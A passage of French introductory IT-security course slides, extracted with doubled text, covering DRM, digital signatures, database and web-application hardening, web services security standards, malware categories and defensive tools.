Contrôle d’accès décentraliséContrôle d’accès décentralisé Web ServicesWeb Services Authentification et autorisation inter-domainesAuthentification et autorisation inter-domaines

DRMDRM Pour l’entreprisePour l’entreprise Pour la vie privée du consommateurPour la vie privée du consommateur

Identité, données relatives à la santé et aux finances personnellesIdentité, données relatives à la santé et aux finances personnelles Contenu numérique pour le marché de masseContenu numérique pour le marché de masse

Livres, films, audio, vidéoLivres, films, audio, vidéo

Page 184: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Collaboration sécuriséeCollaboration sécuriséeExemplesExemples E-mail sécuriséE-mail sécurisé Création et partage sécurité de documentsCréation et partage sécurité de documents Messagerie instantanée sécuriséeMessagerie instantanée sécurisée Signature numérique sécurisée – « Signature numérique sécurisée – « what you see is what you signwhat you see is what you sign » »

Comment cela fonctionne-t-il ?Comment cela fonctionne-t-il ? Utilisation d’une gestion de droits numériques fondée sur la protection par Utilisation d’une gestion de droits numériques fondée sur la protection par

le hardware des secrets pour protéger et contrôler l’accès aux donnéesle hardware des secrets pour protéger et contrôler l’accès aux données Utilisation du chemin sécurisé de/vers l’utilisateur afin de le protéger Utilisation du chemin sécurisé de/vers l’utilisateur afin de le protéger

contre l’espionnage ou l’usurpationcontre l’espionnage ou l’usurpation Utilisation d’un APN pour permettre une sécurisation des messages de Utilisation d’un APN pour permettre une sécurisation des messages de

bout en boutbout en bout

Page 185: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Signature numérique sécuriséeSignature numérique sécurisée

Microsoft Word

This is text that should be verified as correct and then signed.

File Edit View Insert HelpSign Digitally...

Quand l’utilisateur clique « sign »,les données XML sont signées et les données signées sot retournés à l’application

Secure Digital SignatureThis is text that should be verified as correct and then signed.

Sign

Cancel

USPS SignatureSignature:

Quand l’utilisateur veut signer, le texte est rendu par l’application sous le forme d’un format basé

XML et passé à l’agent de signature numérique

NOTE : pour NOTE : pour faciliter faciliter l’explication, l’explication, ceci n’est pas ceci n’est pas l’interface l’interface véritablevéritable

Page 186: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 2Module 2Sécurité des systèmesSécurité des systèmes

2D - Applications2D - Applications

Page 187: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ApplicationsApplicationsLa sécurité des applications dépend de La sécurité des applications dépend de nombreux facteursnombreux facteurs Ont-elles été pensées pour la sécurité ?Ont-elles été pensées pour la sécurité ? Ont-elles été développées par des personnes Ont-elles été développées par des personnes

formées à la sécurité ?formées à la sécurité ? Sont-elles sécurisées par défaut ?Sont-elles sécurisées par défaut ?

RappelsRappels Buffer overflowsBuffer overflows XSSXSS Injection SQLInjection SQL

Page 188: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Bases de donnéesBases de donnéesCréer des vues pour limiter l’accès aux donnéesCréer des vues pour limiter l’accès aux donnéesPartitionnementPartitionnementAjout de bruit (perturbations)Ajout de bruit (perturbations)Éventuellement, pratiquer la polyinstanciation Éventuellement, pratiquer la polyinstanciation (pour créer une couverture)(pour créer une couverture)Sécuriser le système d’exploitation hôteSécuriser le système d’exploitation hôteUtiliser une authentification robusteUtiliser une authentification robusteSi la base gère sa propre authentification, Si la base gère sa propre authentification, imposer des mots de passe complexesimposer des mots de passe complexesLimiter les privilèges (utilisation des rôles)Limiter les privilèges (utilisation des rôles)Désactiver les fonctions dangereuses (type Désactiver les fonctions dangereuses (type procédures stockées ou étendues pouvant procédures stockées ou étendues pouvant appeler un appeler un shellshell))

Page 189: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Bases de donnéesBases de donnéesDédier la machine ou faire tourner la base de Dédier la machine ou faire tourner la base de données dans un compartiment séparédonnées dans un compartiment séparéIsoler le serveur (logiquement et physiquement)Isoler le serveur (logiquement et physiquement)Appliquer les correctifs de sécuritéAppliquer les correctifs de sécuritéMettre les permissions adéquates sur les tables, Mettre les permissions adéquates sur les tables, lignes, colonnes, vueslignes, colonnes, vuesChiffrer les donnéesChiffrer les donnéesUtiliser un compte de service peu privilégiéUtiliser un compte de service peu privilégiéMettre en place de l’auditMettre en place de l’auditSécuriser les procédures stockéesSécuriser les procédures stockéesFiltrer au niveau réseau (ou IPsec) et au niveau Filtrer au niveau réseau (ou IPsec) et au niveau requêterequêteSupprimer les bases exemplesSupprimer les bases exemples

Page 190: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Applications WebApplications WebL’idéal serait que l’application Web soit elle-L’idéal serait que l’application Web soit elle-même sécuriséemême sécuriséeL’équipe sécurité n’y peut plus grand-chose une L’équipe sécurité n’y peut plus grand-chose une fois la décision de déployer effectuéefois la décision de déployer effectuée Sécurisation de l’OS et du serveur WebSécurisation de l’OS et du serveur Web Filtrage d’URL / filtrage applicatif sur un Filtrage d’URL / filtrage applicatif sur un reverse proxyreverse proxy Solution du type pare-feu applicatif comme rWeb de Solution du type pare-feu applicatif comme rWeb de

Deny-All par ex.Deny-All par ex.

Vérifier les données avant leur traitement et Vérifier les données avant leur traitement et éventuellement les adapter avant des les éventuellement les adapter avant des les stocker (pour éviter le stocker (pour éviter le cross site scriptingcross site scripting))

Page 191: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Portails collaboratifsPortails collaboratifsPermissions sur les sites virtuelsPermissions sur les sites virtuelsPermissions sur les documents stockésPermissions sur les documents stockésPermissions sur l’index des documents et Permissions sur l’index des documents et de leurs contenusde leurs contenusGestion de droits numériques sur les Gestion de droits numériques sur les documents stockésdocuments stockés

Page 192: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Gestion de droits numériquesGestion de droits numériques

Page 193: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ContexteContexte

“ But most corporations lose intellectual property through employees. Whether intentionally or inadvertently …

Gartner G2 News Analysis,February 25, 2003

The Yankee Group, 2003

Organizations need better protection of sensitive digital information - trade secrets and customer privacy.

PricewaterhouseCoopers (U.K.), 2002

32% of the worst security problems are caused by insiders

FBI Crime Survey, 2003

Proprietary information theft caused the greatest financial damage of all security failures

“Who Are The Criminals? (continued)Sources of Insider Intrusions in 2003Current employees not employed in management positions are most frequently cited as a source ofinsider intrusions in 2003 (73%) followed by current employees in positions within management (38%).

2004 Annual E-Crime Watch Survey from CERT

Page 194: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Respect (?) de la politique de Respect (?) de la politique de sécurité aujourd’huisécurité aujourd’hui

Page 195: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Perm

ission

(A

CL)

OuiNon

PérimètrePérimètre

Comment se produisent les Comment se produisent les fuitesfuites

Page 196: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Protection des donnéesProtection des donnéesLes limites des dispositifs classiquesLes limites des dispositifs classiques

Permissions sur les partages de fichiersPermissions sur les partages de fichiersPortails avec authentificationPortails avec authentificationMessagerie électronique avec signature et Messagerie électronique avec signature et chiffrementchiffrementFiltrage des accès réseau par pare-feu Filtrage des accès réseau par pare-feu (périmètre mouvant)(périmètre mouvant)N’empêchent pas les fuites (accidentelles N’empêchent pas les fuites (accidentelles ou volontaires) de documents ou de ou volontaires) de documents ou de messages, induisant pertes de revenu, messages, induisant pertes de revenu, pertes d’avantages concurrentiels, de pertes d’avantages concurrentiels, de confiance…confiance…

Page 197: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Gestion de droits numériquesGestion de droits numériquesAugmenter la protection des données Augmenter la protection des données sensibles en contrôlant non seulement sensibles en contrôlant non seulement l’accès à l’information mais aussi l’accès à l’information mais aussi l’usagel’usage qui en est faitqui en est faitProtection de l’information Protection de l’information indépendamment d’un périmètre (à indépendamment d’un périmètre (à l’intérieur et à l’extérieur du système l’intérieur et à l’extérieur du système d’information de l’entreprise), à la fois en d’information de l’entreprise), à la fois en ligne et en mode déconnectéligne et en mode déconnecté La protection est attachée à l’information (elle La protection est attachée à l’information (elle

persiste et la suit partout)persiste et la suit partout)

Page 198: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

FonctionnalitésFonctionnalitésDéfinir qui peut ouvrir, modifier, imprimer, Définir qui peut ouvrir, modifier, imprimer, transférer et / ou entreprendre d’autres transférer et / ou entreprendre d’autres actions avec les données (possibilité d’utiliser actions avec les données (possibilité d’utiliser des listes de distribution contenues dans un des listes de distribution contenues dans un annuaire)annuaire)Fixer une date d’expiration sur des messages Fixer une date d’expiration sur des messages électroniques ou des documents…électroniques ou des documents… … … à une date donnéeà une date donnée … … n jours après la publicationn jours après la publication … … tous les n jours, en exigeant l’acquisition tous les n jours, en exigeant l’acquisition

d’une nouvelle licenced’une nouvelle licence

Page 199: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ÉchangesÉchanges

AuteurAuteur DestinataireDestinataire

Serveur DRMServeur DRM

Annuaire / base de données

2 3

4

5

1

2.2. L’auteur définit un ensemble de L’auteur définit un ensemble de droits d’utilisation et de règles droits d’utilisation et de règles pour son fichier; l’application crée pour son fichier; l’application crée une licence de publication et une licence de publication et chiffre le fichier.chiffre le fichier.

3.3. L’auteur distribue le fichier.L’auteur distribue le fichier.4.4. Le destinataire ouvre le fichier, Le destinataire ouvre le fichier,

l’application appelle le serveur l’application appelle le serveur DRM qui vérifie que l’utilisateur est DRM qui vérifie que l’utilisateur est valide et fournit une licence valide et fournit une licence d’utilisation.d’utilisation.

5.5. L’application effectue le rendu du L’application effectue le rendu du fichier et fait respecter les droits.fichier et fait respecter les droits.

1.1. L’auteur reçoit un certificat la L’auteur reçoit un certificat la première fois qu’il protège des première fois qu’il protège des informations. informations.

Page 200: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

LimitesLimitesN’empêche pas les attaques analogiquesN’empêche pas les attaques analogiquesNécessite une application qui ne fuit pasNécessite une application qui ne fuit pas

Page 201: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Applications bureautiquesApplications bureautiquesSécurité de la messagerie (S/MIME)Sécurité de la messagerie (S/MIME)Patch managementPatch managementCanaux cachés (commentaires, mode Canaux cachés (commentaires, mode révision…)révision…)ChiffrementChiffrementGestion de droits numériquesGestion de droits numériques

Page 202: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Systèmes embarqués fixes et mobilesSystèmes embarqués fixes et mobilesLe défi de demainLe défi de demain TéléphonesTéléphones PDAPDA Autre facteur de formeAutre facteur de forme

Des virus preuves de concept on déjà vu Des virus preuves de concept on déjà vu le jourle jour

Page 203: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Web Services et FédérationWeb Services et FédérationFédération des identités et Fédération des identités et Web servicesWeb services

Les deux permettent une intégration avec faible couplage entre Les deux permettent une intégration avec faible couplage entre des domaines autonomes (à l’intérieur ou à l’extérieur des domaines autonomes (à l’intérieur ou à l’extérieur d’organisations) d’organisations)

Les Les Web services Web services doivent s’identifier et s’authentifier eux- doivent s’identifier et s’authentifier eux-mêmes, et/ou l’utilisateur au nom duquel ils agissentmêmes, et/ou l’utilisateur au nom duquel ils agissent

WS-Security, SAML, et autresjetons pour clients supportant SOAP

SSO Web pour navigateur à l’aide de SSL et de cookies

Web services SOAP avec authentification basique, SSL

Modèle actuel Modèle futur, émergent

WS-*

Page 204: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Standard W3CFondation pour les Web services

Largement supporté

Standard OASISLargement supporté

Non développés et a fortiori non publiés

Spécifications utilisables gratuitement; en cours de développement.

Web Services et FédérationWeb Services et FédérationFeuille de route de la sécurité des Web ServicesFeuille de route de la sécurité des Web Services

SOAP

WS-Security

WS-Policy WS-Trust WS-Privacy

WS-Secure Conversation WS-Federation WS-Authorization

Page 205: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

• Enveloppe de sécurité de base pour SOAP

• Authentification des extrémités, intégrité (XML Digital Signature), confidentialité (XML Encryption)

• Supporte de multiples jetons dont SAML, les certificats X.509, les tickets Kerberos, les licences XrML

• WS-I Basic Security Profile publié début 2004

Web Services and FederationWeb Services and FederationWS-SecurityWS-Security

SOAP

WS-Security

WS-Policy WS-Trust

WS-Secure Conversation WS-Federation

Page 206: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

• Fournit un contexte de sécurité pour une série de messages SOAP

• Établissement du contexte de sécurité

• Modèle d’authentification du contexte

• Dérivation de clé de session

Web Services and FederationWeb Services and FederationWS-Secure-ConversationWS-Secure-Conversation

SOAP

WS-Security

WS-Policy WS-Trust

WS-Secure Conversation WS-Federation

Page 207: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

• Définit des méthodes pour fournir et échanger des jetons de sécurité

• Supporte la possibilité de fournir, renouveler, valider et déléguer des jetons

• Supporte de nombreuses topologies (directes ou intermédiaires)

• Indépendant du format du jeton : SAML, nom d’utilisateur, certificats X.509, tickets Kerberos, XrML, …

Web Services et FédérationWeb Services et FédérationWS-TrustWS-Trust

SOAP

WS-Security

WS-Policy WS-Trust

WS-Secure Conversation WS-Federation

Page 208: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

• Tire parti de WS-Trust, pour permettre le SSO

• Inclus son propre message de logout

• Profils pour les clients actifs (Web Services) et passifs (navigateurs Web)

• Service d’attributs, service de pseudonymes

• Profil passif testé avec des jetons SAML depuis début 2004 par plusieurs fournisseurs

Web Services et FédérationWeb Services et FédérationWS-FederationWS-Federation

SOAP

WS-Security

WS-Policy WS-Trust

WS-Secure Conversation WS-Federation

Page 209: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 2Module 2Sécurité des systèmesSécurité des systèmes

2E - Codes malveillants2E - Codes malveillants

Page 210: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Codes malveillantsCodes malveillantsProgrammes ou morceaux de Programmes ou morceaux de programmes qui ont un but malveillantprogrammes qui ont un but malveillantOn distingue pour les différents typesOn distingue pour les différents types Leur mode de propagationLeur mode de propagation Leur chargeLeur charge

On en compte plus de 50 000 référencés On en compte plus de 50 000 référencés par les éditeurs d’antiviruspar les éditeurs d’antivirusSophistication en hausse (cf menaces Sophistication en hausse (cf menaces combinées)combinées)

Page 211: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

VirusVirusPropagation : infection automatique de fichiers pour Propagation : infection automatique de fichiers pour multiplier le nombre d’occurrences porteuses du virusmultiplier le nombre d’occurrences porteuses du virusCharge : action malveillante (peut être plus ou moins Charge : action malveillante (peut être plus ou moins destructrice comme la destruction de fichiers, le destructrice comme la destruction de fichiers, le chiffrement de données, l’affichage de messages ou de chiffrement de données, l’affichage de messages ou de graphiques… parfois elle n’existe pas)graphiques… parfois elle n’existe pas)Comme dans le biologique, où le virus vient s’insérer Comme dans le biologique, où le virus vient s’insérer dans les cellules des organismes vivantesdans les cellules des organismes vivantesDifférents typesDifférents types

BootBoot ExécutablesExécutables MacroMacro

Utilise souvent la crédulité de l’utilisateur pour réaliser Utilise souvent la crédulité de l’utilisateur pour réaliser l’infection (pièce jointe dans un e-mail, fichier exécutables l’infection (pièce jointe dans un e-mail, fichier exécutables infecté situé sur un support amovible, P2P)infecté situé sur un support amovible, P2P)

Page 212: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

VerVerPropagation : code exploitant se répandant par le réseau Propagation : code exploitant se répandant par le réseau automatiquementautomatiquementCharge : idem virusCharge : idem virusComme dans le biologique : le ver vit dans l’intestin de Comme dans le biologique : le ver vit dans l’intestin de l’être parasitél’être parasitéLe ver exploite une vulnérabilitéLe ver exploite une vulnérabilitéLe pur ver n’existe que dans la mémoire des machines Le pur ver n’existe que dans la mémoire des machines infectéesinfectéesNe nécessite aucune intervention de l’utilisateur pour Ne nécessite aucune intervention de l’utilisateur pour réaliser l’infectionréaliser l’infectionExiste aussi sous la forme de Existe aussi sous la forme de mass-mailermass-mailer récupérant le récupérant le carnet d’adresse de l’utilisateur puis expédiant des carnet d’adresse de l’utilisateur puis expédiant des messages infectés avec son propre moteur SMTPmessages infectés avec son propre moteur SMTP

Page 213: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cheval de TroieCheval de TroiePropagation : par action (in)volontaire de l’utilisateurPropagation : par action (in)volontaire de l’utilisateurCharge : Charge :

ouvre une porte dérobée permettant d’avoir le contrôle total de ouvre une porte dérobée permettant d’avoir le contrôle total de la machine, la machine,

change des paramètres (page de démarrage du navigateur par change des paramètres (page de démarrage du navigateur par ex., numéroteur automatique vers n° surtaxé) ex., numéroteur automatique vers n° surtaxé)

installe parfois des logiciels espions, des enregistreurs de installe parfois des logiciels espions, des enregistreurs de frappes clavier (=frappes clavier (=keyloggerskeyloggers) ou des kits de pirate (=) ou des kits de pirate (=rootkits rootkits ou ou relais de messagerie utilisés par les relais de messagerie utilisés par les spammersspammers))

Comme dans la mythologie, on fait croire à l’utilisateur Comme dans la mythologie, on fait croire à l’utilisateur que le logiciel a une fonction intéressante mais celle-ci que le logiciel a une fonction intéressante mais celle-ci cache ses véritables actions criminellescache ses véritables actions criminelles

Page 214: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SpywareSpywareAussi appelé logiciel espion ou espiogicielAussi appelé logiciel espion ou espiogicielPropagation : souvent par cheval de Troie Propagation : souvent par cheval de Troie ou par verou par verCharge : espionne l’utilisateur en allant du Charge : espionne l’utilisateur en allant du marketing au vol d’informations bancaires. marketing au vol d’informations bancaires. Envoi automatique des résultats vers des Envoi automatique des résultats vers des sites Websites Web

Page 215: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Menaces combinéesMenaces combinéesCodes ayant plusieurs caractéristiques Codes ayant plusieurs caractéristiques empruntées aux vers, virus, chevaux de empruntées aux vers, virus, chevaux de Troie, logiciels espions,…Troie, logiciels espions,…Les plus fréquents désormaisLes plus fréquents désormaisEn effet, les menaces combinées les plus En effet, les menaces combinées les plus récentes :récentes : Infectent des fichiers (= virus)Infectent des fichiers (= virus) Se propage par l’exploitation de plusieurs Se propage par l’exploitation de plusieurs

vulnérabilités (=vers)vulnérabilités (=vers) Installent des portes dérobées (= chevaux de Installent des portes dérobées (= chevaux de

Troie)Troie)

Page 216: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

CanularsCanularsMessages électronique, chaînes de messages relatant Messages électronique, chaînes de messages relatant des histoires fausses dans le but de faire croire en leur des histoires fausses dans le but de faire croire en leur existence aux personnes les plus crédulesexistence aux personnes les plus crédulesLeur nocivité est en général limitée à l’encombrement Leur nocivité est en général limitée à l’encombrement inutile des boîtes aux lettres (parfois on fait supprimer inutile des boîtes aux lettres (parfois on fait supprimer des fichiers systèmes à l’utilisateur ou on lui fait croire des fichiers systèmes à l’utilisateur ou on lui fait croire qu’il est infecté)qu’il est infecté)On les devine :On les devine :

Mentionnent des histoires assez peu vraisemblablesMentionnent des histoires assez peu vraisemblables Font référence à plusieurs grands nomsFont référence à plusieurs grands noms Ne donnent aucun fait précis vérifiableNe donnent aucun fait précis vérifiable Ne donnent aucune référence concrète (adresse Web du Ne donnent aucune référence concrète (adresse Web du

communiqué officiel des sociétés)communiqué officiel des sociétés)En anglais : En anglais : hoaxhoaxRelèvent souvent de la psychologie de groupe, parfois Relèvent souvent de la psychologie de groupe, parfois de l’escroqueriede l’escroquerie

Page 217: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

PhishingPhishingUsurpation de marque ayant pour but la Usurpation de marque ayant pour but la récupération d’informations bancaires ou récupération d’informations bancaires ou d’authentificationd’authentificationPose la question de la confiance dans les Pose la question de la confiance dans les échanges sur Internetéchanges sur Internet

Page 218: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Moyens de préventionMoyens de préventionPour les virus et les chevaux de Troie Pour les virus et les chevaux de Troie

un utilisateur averti peut éviter l’infection en suivant un utilisateur averti peut éviter l’infection en suivant scrupuleusement des précautionsscrupuleusement des précautions

Le confort consiste à exécuter un antivirusLe confort consiste à exécuter un antivirus

Pour les versPour les vers la défense en profondeur (en particulier l’utilisation d’un pare-la défense en profondeur (en particulier l’utilisation d’un pare-

feu) et l’application des mises à jour de sécuritéfeu) et l’application des mises à jour de sécurité En plus, on peut considérer l’utilisation d’un logiciel de blocage En plus, on peut considérer l’utilisation d’un logiciel de blocage

comportementalcomportemental

Pour les Pour les spywaresspywares, le vecteur d’infection n° 1 étant la , le vecteur d’infection n° 1 étant la navigation sur le Webnavigation sur le Web

Avoir un navigateur à jour, configuré de manière conservative, Avoir un navigateur à jour, configuré de manière conservative, avec tous les patchesavec tous les patches

Ne pas aller sur les sites dangereux (ou utiliser une machine Ne pas aller sur les sites dangereux (ou utiliser une machine virtuelle)virtuelle)

Page 219: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Moyens de préventionMoyens de préventionPour les canulars, il faut informer les utilisateurs Pour les canulars, il faut informer les utilisateurs afin qu’ils puissent les reconnaître et les ignorer. afin qu’ils puissent les reconnaître et les ignorer. De bons sites existent (type hoaxbuster)De bons sites existent (type hoaxbuster)Pour le Pour le phishingphishing : votre avis ? : votre avis ?Enfin, au-delà de la défense en profondeur et de Enfin, au-delà de la défense en profondeur et de la gestion de la sécurité (patch management), la gestion de la sécurité (patch management), n’oublions pas la réduction des privilègesn’oublions pas la réduction des privilèges Quand l’utilisateur lance un programme (virus, cheval Quand l’utilisateur lance un programme (virus, cheval

de Troie, de Troie, spywarespyware) celui-ci hérite de ses privilèges) celui-ci hérite de ses privilèges Nombreux sont les virus / chevaux de Troie / Nombreux sont les virus / chevaux de Troie /

spywares spywares qui ont une action limitée si l’utilisateur n’est qui ont une action limitée si l’utilisateur n’est pas administrateur de son poste. Ceci est un des pas administrateur de son poste. Ceci est un des problèmes les plus importants sous Windows problèmes les plus importants sous Windows aujourd’huiaujourd’hui

Page 220: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 2Module 2Sécurité des systèmesSécurité des systèmes

2F – Outils de sécurité2F – Outils de sécurité

Page 221: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Outils de sécuritéOutils de sécuritéIl en existe de nombreux outils additionnels dédiés à la Il en existe de nombreux outils additionnels dédiés à la sécuritésécurité

AntivirusAntivirus AntispywareAntispyware Scanner de vulnérabilitéScanner de vulnérabilité Logiciels de Logiciels de patch managementpatch management Et aussi Et aussi

Méta annuaireMéta annuairePKIPKIVPNVPNChiffrement de fichiersChiffrement de fichiersChiffrement de communicationsChiffrement de communicationsSignatureSignatureSniffer réseauSniffer réseauIDS / IPSIDS / IPS……

Page 222: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AntivirusAntivirusOn ne les présente plus…On ne les présente plus…Très souvent basés sur des signaturesTrès souvent basés sur des signatures Dans ce cas, il est extrêmement important Dans ce cas, il est extrêmement important

d’être à jour pour avoir une protection valabled’être à jour pour avoir une protection valable Toutes les signatures ne se valent pas Toutes les signatures ne se valent pas

certaines sont des suites d’octets (donc risque de certaines sont des suites d’octets (donc risque de non détection si modification d’un des octets non non détection si modification d’un des octets non significatifs dans une variante)significatifs dans une variante) d’autres sont des éléments logiques (et d’autres sont des éléments logiques (et permettent de détecter des variantes)permettent de détecter des variantes)

Page 223: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AntivirusAntivirusParfois heuristiquesParfois heuristiques

Pour les virus macro en particulier (cf Office)Pour les virus macro en particulier (cf Office) Certains se passent complètement de signatures (cf Viguard, Certains se passent complètement de signatures (cf Viguard,

plus proche d’un HIPS que d’un antivirus)plus proche d’un HIPS que d’un antivirus)A priori efficaces contre les virus, les chevaux de Troie A priori efficaces contre les virus, les chevaux de Troie et certaines menaces combinées mais souvent pas et certaines menaces combinées mais souvent pas contre les vers ni les contre les vers ni les spywaresspywaresLa question du nettoyage doit quand même être posée La question du nettoyage doit quand même être posée

En effet, si une menace combinée s’exécute avec tous les En effet, si une menace combinée s’exécute avec tous les privilèges sur une machine et installe une porte dérobéeprivilèges sur une machine et installe une porte dérobée

L’antivirus sait éliminer les effets immédiats de la menace L’antivirus sait éliminer les effets immédiats de la menace combinéecombinée

Qu’est-ce qui prouve que la porte dérobée n’a pas été utilisée Qu’est-ce qui prouve que la porte dérobée n’a pas été utilisée pour ouvrir une seconde porte dérobée, installer un pour ouvrir une seconde porte dérobée, installer un rootkitrootkit qui qui fait que cette porte dérobée est impossible à détecter par le fait que cette porte dérobée est impossible à détecter par le système lui-même ?système lui-même ?

Dans le doute, il est préférable de reconstruire la machine de Dans le doute, il est préférable de reconstruire la machine de zéro avec des supports fiables et de restaurer les donnéeszéro avec des supports fiables et de restaurer les données

Page 224: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AntispywareAntispywareEmpêchent l’installation de Empêchent l’installation de spywaresspywaresAprès coup, détectent et éliminent les Après coup, détectent et éliminent les spywaresspywares (en utilisant des signatures) (en utilisant des signatures)Souvent gratuits pour un usage personnelSouvent gratuits pour un usage personnel Spybot, Ad-ware, Windows AntispywareSpybot, Ad-ware, Windows Antispyware

Page 225: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Scanner de vulnérabilitésScanner de vulnérabilitésUtilisés dans le cadre du maintien de la sécurité Utilisés dans le cadre du maintien de la sécurité ou dans des missions de tests de pénétrationou dans des missions de tests de pénétrationProblèmesProblèmes Certaines vulnérabilités ne peuvent être détectées Certaines vulnérabilités ne peuvent être détectées

qu’en ayant une exploitation destructive (déni de qu’en ayant une exploitation destructive (déni de service)service)

